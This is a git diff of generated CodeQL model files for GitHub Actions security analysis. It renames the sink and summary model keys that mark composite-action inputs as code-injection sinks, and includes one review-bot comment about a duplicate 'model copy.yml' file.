88348f05cd0d..7f2622feecd8 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed4729..3aa8c3bc6495 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a08..b79317db9c8a 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e19..843e0d20b98a 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c9..2a0fd3ac371d 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19ccc..3ef29cc9b84f 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179c..71d2012eb029 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e1..a67aeb905958 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e855578..1f5dd108f910 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273df..ea4a2a2a3c76 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8e..29973ccdbd74 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c448580..2db70ffea663 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d4..8a4273e8cafd 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f6..de09b35f1d46 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4ac..91e6268e6140 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e80..777212d9a0a6 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2c..8cc0ab83a420 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a5616..f1244bdd5dec 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f4..37814510c8c4 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcfc..48e40c36beaa 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c0..0edb2c5f8cdc 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce1..61210d17abb9 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f6396..22dc1a406293 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace1704..b2888b571a8a 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0a..bc188d91f1bb 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d2..d5defe67401e 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c635..d97fedbed130 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab0838090..e22c29b09f11 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631d..7203bb8345c6 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df4990..dcfbb0ea2032 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4a..6c5d6edd572c 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml 
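Review bot: The hunk for `ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml` looks like a stray duplicate of the generated `elastic_apm-server.model.yml` (note the `copy` suffix and the space in the filename), and the commit renames its `extensible` key rather than removing it. If both files are loaded as extensions, the `elastic/apm-server` summary rows would presumably be declared twice under `actionsSummaryModel`; duplicate rows are unlikely to change results, but a hand-named file inside a `generated/` tree will be silently overwritten or orphaned by the next regeneration. I would drop the `model copy.yml` file in this commit, or at least rename it to whatever the generator expects so its rows are not maintained by hand.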
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d304576..fdaee61066ed 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee4798..d68c4e57c8ad 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9b..85a8d2f4d65d 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea4..d22754092787 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680bc..4dc0b87214b3 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769af..ea1a8a8afecb 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc7..5ce00c29e52b 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa618..d1f551b66da3 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e338..6f8845ec1c0a 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272c..152fdfed4477 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bdc..5919ade7e819 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed9..d9afa5bb21fe 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf9..0b36853a8914 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea330..2bd521d42f58 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921efe..8ae81e706a42 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5e..4893772b71ae 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b7..e174c830a855 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950c..14070215bfa3 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
